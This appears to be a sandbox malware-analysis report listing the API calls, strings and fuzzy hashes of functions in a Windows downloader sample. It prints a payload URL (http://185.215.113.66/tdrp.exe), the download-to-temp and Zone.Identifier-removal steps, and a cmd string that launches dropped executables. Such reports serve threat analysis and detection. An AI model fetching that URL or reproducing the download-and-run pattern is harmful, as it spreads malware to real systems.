API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$Unnamed volume
API String ID: 1650488544-2117135753
Opcode ID: 6974238dd60dc41e759f6327b3a1842fb176e72b84ceacc6ef531622de16a7a4
Instruction ID: ea23d1944f0e1bd73e272539d3ecab5bae4bfc5cfa7fae717b1661bdcf280d15
Opcode Fuzzy Hash: 6974238dd60dc41e759f6327b3a1842fb176e72b84ceacc6ef531622de16a7a4
Instruction Fuzzy Hash: B14165B1D00214BBEB24DB94DC45FEE7778BB48700F1085AAF20AB51D0DA785B84CF6A

Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
htons.WS2_32(0000076C), ref: 0040E1E0
inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D

Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

bind.WS2_32(000000FF,?,00000010), ref: 0040E243
lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

X#A, xrefs: 0040E258, 0040E25B
239.255.255.250, xrefs: 0040E1EA

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250$X#A
API String ID: 726339449-2206458040
Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A

Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040666B
CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
wsprintfW.USER32 ref: 004066C4
wsprintfW.USER32 ref: 004066E5

Strings

/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
cl@, xrefs: 004066A0
/c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
%comspec%, xrefs: 004066EE

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: wsprintf$CreateInitializeInstance
String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
API String ID: 1147330536-497122036
Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A

Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040D782
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
GetTickCount.KERNEL32 ref: 0040D7F4
Sleep.KERNEL32(00000001), ref: 0040D814
GetTickCount.KERNEL32 ref: 0040D81A

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99

Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040B45D

Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D

socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
connect.WS2_32(000000FF,?,00000010), ref: 0040B496
getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

Strings

www.update.microsoft.com, xrefs: 0040B467

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A

Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8

Function 0040DF20 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON

Download Yara Rule

APIs

NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Time$QuerySecondsSince1980System
String ID:
API String ID: 1987401769-0
Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5

Function 0040FB45 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 0040FBF6

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: ced8983033102d54867bf5cbfeed89e683895f1891ac2068456569e0b106ba6f
Instruction ID: afca00f832930446c8c80b5bb844982abc92ce79e1d75cdcaeca13e1d3115251
Opcode Fuzzy Hash: ced8983033102d54867bf5cbfeed89e683895f1891ac2068456569e0b106ba6f
Instruction Fuzzy Hash: 8061EA306046059FDB39CF29C4A16A673A5FF85754B28807BD912E7AD4E338EC4AC74C

Function 0040A890 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: HeapsProcess
String ID:
API String ID: 1420622215-0
Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E

Function 0040F560 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 231
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040F569
srand.MSVCRT ref: 0040F570
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
strlen.NTDLL ref: 0040F59A
mbstowcs.NTDLL ref: 0040F5B1
rand.MSVCRT ref: 0040F5B9
rand.MSVCRT ref: 0040F5CD
wsprintfW.USER32 ref: 0040F5F4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
wsprintfW.USER32 ref: 0040F6F4
DeleteFileW.KERNEL32(?), ref: 0040F704
Sleep.KERNEL32(000003E8), ref: 0040F70F
Sleep.KERNEL32(000007D0), ref: 0040F730
ExitProcess.KERNEL32 ref: 0040F758
DeleteFileW.KERNEL32(?), ref: 0040F76E
CloseHandle.KERNEL32(000000FF), ref: 0040F77B
InternetCloseHandle.WININET(00000000), ref: 0040F788
InternetCloseHandle.WININET(00000000), ref: 0040F795
Sleep.KERNEL32(000003E8), ref: 0040F7A0
rand.MSVCRT ref: 0040F7B5
Sleep.KERNEL32 ref: 0040F7C6
rand.MSVCRT ref: 0040F7CC
rand.MSVCRT ref: 0040F7E0
wsprintfW.USER32 ref: 0040F807
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
wsprintfW.USER32 ref: 0040F844
DeleteFileW.KERNEL32(?), ref: 0040F854
Sleep.KERNEL32(000003E8), ref: 0040F85F
Sleep.KERNEL32(000007D0), ref: 0040F880
ExitProcess.KERNEL32 ref: 0040F8A7
DeleteFileW.KERNEL32(?), ref: 0040F8B6

Strings

%s\%d%d.exe, xrefs: 0040F5E8
%temp%, xrefs: 0040F58B
%s:Zone.Identifier, xrefs: 0040F838
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
%s:Zone.Identifier, xrefs: 0040F6E8
%s\%d%d.exe, xrefs: 0040F7FB

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 1632876846-2803014298
Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004064A9
srand.MSVCRT ref: 004064B0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
rand.MSVCRT ref: 004064D6
rand.MSVCRT ref: 004064EA
wsprintfW.USER32 ref: 0040650F
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
CreateFileW.KERNEL32(00418C60,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
CloseHandle.KERNEL32(000000FF), ref: 004065F2
wsprintfW.USER32 ref: 00406609
DeleteFileW.KERNEL32(?), ref: 00406619
CloseHandle.KERNEL32(000000FF), ref: 0040662D
InternetCloseHandle.WININET(00000000), ref: 0040663A
InternetCloseHandle.WININET(00000000), ref: 00406647

Strings

%s\%d%d.exe, xrefs: 00406505
%s:Zone.Identifier, xrefs: 004065FD
%temp%, xrefs: 004064CB
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
http://185.215.113.66/tdrp.exe, xrefs: 00406546

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
API String ID: 2816847299-853099633
Opcode ID: 56706e44798356b7572e1a37c7e5d1ca0007806081ef3840285258a0d3788cbe
Instruction ID: 260a5db52ef3cb993a2dd101fb69ee4519de9f16e17bf86abeeabefcdfa08dc0
Opcode Fuzzy Hash: 56706e44798356b7572e1a37c7e5d1ca0007806081ef3840285258a0d3788cbe
Instruction Fuzzy Hash: 3F4183B4A41318BBD7219B60DC4DFDA7774AB08701F1085E9F60AB61D1DABD6AC0CF68

Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE

strcmp.NTDLL ref: 0040B880

Strings

.192., xrefs: 0040B92C
.10, xrefs: 0040B96D
0.0.0.0, xrefs: 0040B86E
.127., xrefs: 0040B8CD
127., xrefs: 0040B891
192., xrefs: 0040B8F0
.127, xrefs: 0040B8AF
.10., xrefs: 0040B98B
.192, xrefs: 0040B90E
10., xrefs: 0040B94F

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: eb7224054a158a52b9ac69d6d16f6173323bcfe201a97fa3a535776023befe3b
Instruction ID: 3ee44f18a61b924fa5be016672ea3184f50a33bf8f1a1d07a29faf7bd11f58f4
Opcode Fuzzy Hash: eb7224054a158a52b9ac69d6d16f6173323bcfe201a97fa3a535776023befe3b
Instruction Fuzzy Hash: B16191B4A002059BDB10AFA1FC52B9A3665EB50318F14803AF805B73C1E77DE954CBEE

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
